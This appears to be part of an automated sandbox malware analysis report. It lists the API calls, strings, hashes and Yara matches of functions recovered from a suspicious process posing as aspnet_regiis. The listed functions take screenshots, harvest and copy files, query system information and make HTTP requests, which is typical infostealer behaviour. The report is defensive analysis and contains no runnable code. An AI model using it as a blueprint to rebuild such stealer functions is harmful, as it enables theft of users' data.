                                                                                                                            • __aulldiv.LIBCMT ref: 6CC236E4
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC23773
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC2377E
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC237BD
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 6CC237C4
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC237CB
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC23801
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC23883
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC23902
                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC23918
                                                                                                                            • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC2394C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                            • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                            • API String ID: 301339242-3790311718
                                                                                                                            • Opcode ID: 4beefb42264f6f66f99be3af24fd980ba7f763234d9a691554eff280fe6e0afe
                                                                                                                            • Instruction ID: c5d28db8f31fb233b76978c9533a52be0b6f4c3300fe9a72af5649d728b7c8fa
                                                                                                                            • Opcode Fuzzy Hash: 4beefb42264f6f66f99be3af24fd980ba7f763234d9a691554eff280fe6e0afe
                                                                                                                            • Instruction Fuzzy Hash: 92B1A371B043009FDB08DF69D85965E77F9FB8A700F098A2EE899D7760E774D8018B91
                                                                                                                            Function 00415FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                            • API String ID: 2178766154-445461498
                                                                                                                            • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                            • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                                            • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                            • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                                            Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                            • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                              • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                              • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                              • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                              • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                              • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                              • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                            • wsprintfA.USER32 ref: 00411949
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                            • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                            • API String ID: 2280294774-461178377
                                                                                                                            • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                            • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                                            • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                            • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                                            Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: /$UT
                                                                                                                            • API String ID: 0-1626504983
                                                                                                                            • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                            • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                            • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                            • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                            Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                            • String ID: ERROR$ERROR$GET
                                                                                                                            • API String ID: 3863758870-2509457195
                                                                                                                            • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                            • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                            • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                            • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                            Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                            • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                            • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                            • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                            • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                              • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                              • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                            • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                            • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                            • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                            • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2610876673-0
                                                                                                                            • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                            • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                            • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                            • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                            Function 00401D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                            • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                            • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                              • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 004026C6
                                                                                                                            • FindClose.KERNEL32(?), ref: 004026DA
                                                                                                                              • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 1475085387-1173974218
                                                                                                                            • Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                            • Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
                                                                                                                            • Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
                                                                                                                            • Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99
                                                                                                                            Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • wsprintfA.USER32 ref: 0041546A
                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                                            • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                                            • FindClose.KERNEL32(?), ref: 00415637
                                                                                                                            Strings
